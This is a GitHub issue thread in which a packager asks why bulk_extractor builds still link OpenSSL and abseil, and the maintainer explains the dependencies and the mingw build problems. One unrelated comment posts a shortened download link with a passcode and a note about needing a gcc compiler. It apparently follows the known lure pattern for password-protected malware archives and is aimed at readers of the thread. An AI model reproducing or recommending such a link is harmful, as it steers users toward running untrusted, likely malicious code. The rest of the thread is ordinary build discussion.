### ISSUE TITLE
Looks like openssl is still linked to bulk_extractor?

### ISSUE THREAD

**Issue by chenrui333** [simsong/bulk_extractor#475]
👋 I can still see openssl linkage for `bulk_extractor` for the homebrew build, but in the build note, it said openssl is not required, is that true?

https://github.com/simsong/bulk_extractor/blob/b2279ce0c7e85cf5a68cbc1d130ffc4ac322f263/etc/CONFIGURE_MACOS.bash#L26

Also another thing, it looks like abseil is linked for macos builds, but not linux build, did I miss any build config? Thanks!

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by simsong** [comment]
Hi. Sorry about the confusion here. Let me try to clarify:
* `bulk_extractor` requires OpenSSL on some platforms, but not on MacOS, as it uses the OS-provided encryption routines there.
*  `bulk_extractor` now really wants to use `re2` which requires `abseil`. So it really does require both!
* This is a problem for the mingw compilation, since I can't find a decent `re2` and `abseil` package for mingw.
* I also can't find another decent regex package that will handle this regex gracefully: `.*@company.com`. 

Please let me know if you have suggestions to help me address above.

**Comment by chenrui333** [comment]
> * `bulk_extractor` requires OpenSSL on some platforms, but not on MacOS, as it uses the OS-provided encryption routines there.

but if openssl present, then it would link to the openssl instead of os-provided crypto?

> * `bulk_extractor` now really wants to use `re2` which requires `abseil`. So it really does require both!

I thought about it, make sense to me, but somehow on the brew linux build, the abseil did not get linked, do you know why?

**Comment by simsong** [comment]
> > * `bulk_extractor` requires OpenSSL on some platforms, but not on MacOS, as it uses the OS-provided encryption routines there.
> 
> but if openssl present, then it would link to the openssl instead of os-provided crypto?

No. `bulk_extractor` uses dfxml for its hashing, and if common crypto is provided, it will use that instead of openSSL:

https://github.com/dfxml-working-group/dfxml_cpp/blob/1e92fe8ac74e0319324ad3956ce99b54455258fa/src/hash_t.h#L55

> 
> > * `bulk_extractor` now really wants to use `re2` which requires `abseil`. So it really does require both!

> 
> I thought about it, make sense to me, but somehow on the brew linux build, the abseil did not get linked, do you know why?

Perhaps it's in the base library somewhere.
